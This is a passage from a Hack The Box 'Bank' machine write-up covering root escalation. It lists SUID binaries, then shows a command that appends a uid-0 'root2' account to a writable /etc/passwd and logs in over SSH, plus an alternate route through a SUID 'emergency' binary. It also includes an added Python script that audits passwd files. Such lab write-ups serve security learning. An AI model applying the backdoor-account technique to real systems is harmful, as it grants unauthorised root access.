-rwsr-xr-x 1 root root 66284 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 156708 May 29 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
-rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
-rwsr-xr-x 1 root root 35300 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
-rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount
-rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
Root Flag
/etc/passwd
www-data@bank:/tmp$ echo "root2:`openssl passwd hello`:0:0:root:/root:/bin/bash" >> /etc/passwd
This appends a new line for the user root2, with uid 0 and password hello, to /etc/passwd.
root@kali:~/HTB/Machines/Bank# ssh root2@bank.htb
The authenticity of host 'bank.htb (10.10.10.29)' can't be established.
ECDSA key fingerprint is SHA256:FzRjUWEJH7r9hunMHbWe5kA2nfM0lnrdGyDQQ9uXg68.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bank.htb' (ECDSA) to the list of known hosts.
root2@bank.htb's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-79-generic i686)

 System information as of Fri Nov 22 02:39:54 EET 2019

  System load:  0.16              Memory usage: 4%   Processes:       84
  Usage of /:   7.4% of 28.42GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Jun 16 07:44:56 2017
root@bank:~# whoami
root
root@bank:~# cat /root/root.txt
<ROOT FLAG>
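The two conditions this step relies on, a group/other-writable /etc/passwd and an extra uid 0 account whose hash sits inline in passwd rather than in shadow, are easy to audit. The following is an added example, not part of the original write-up: the passwd content and the mode value are constructed to mirror what LinEnum reported and the root2 line appended above, the hash is a placeholder, and the function names are my own.

```python
"""Audit a passwd file for a lax mode and for rogue uid-0 accounts.

Added example, not part of the original write-up. It models the /etc/passwd
weakness LinEnum flagged (-rw-rw-rw-) and the root2 line appended to it.
"""
import stat
from dataclasses import dataclass
from typing import List

# Password-field values that carry no usable hash (shadowed or locked accounts).
SHADOWED_MARKERS = {"x", "*", "!"}


@dataclass
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd(5) lines; a malformed line raises instead of being skipped silently."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(text: str, mode: int) -> List[str]:
    """Return human-readable findings for the file mode and for each entry."""
    findings = []
    # Mode check: the file must only be writable by root (owner).
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"/etc/passwd is {stat.filemode(mode)}: writable by group or others")
    for e in parse_passwd(text):
        # Any uid-0 account other than root is a second root login.
        if e.uid == 0 and e.name != "root":
            findings.append(f"extra uid-0 account: {e.name} (shell {e.shell})")
        # A hash in passwd bypasses shadow protections; an empty field means no password at all.
        if e.passwd not in SHADOWED_MARKERS:
            kind = "empty password" if e.passwd == "" else "hash stored in passwd instead of shadow"
            findings.append(f"{kind}: {e.name}")
    return findings


# Constructed sample: a minimal Ubuntu 14.04-style passwd with the appended root2 line
# (PLACEHOLDER_CRYPT_HASH stands in for the openssl passwd output; not a real hash).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
chris:x:1000:1000:chris,,,:/home/chris:/bin/bash
root2:PLACEHOLDER_CRYPT_HASH:0:0:root:/root:/bin/bash
"""
SAMPLE_MODE = 0o100666    # -rw-rw-rw-, as LinEnum reported for /etc/passwd
HARDENED_MODE = 0o100644  # -rw-r--r--, the expected mode

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD, SAMPLE_MODE):
        print("[!]", finding)
```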
/var/htb/bin/emergency
The alternative way is to use the emergency program found earlier.
www-data@bank:/tmp$ whoami
whoami
www-data
www-data@bank:/tmp$ /var/htb/bin/emergency
/var/htb/bin/emergency
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
<ROOT FLAG>
References
Daniel Simao 18:03, 21 November 2019 (EST)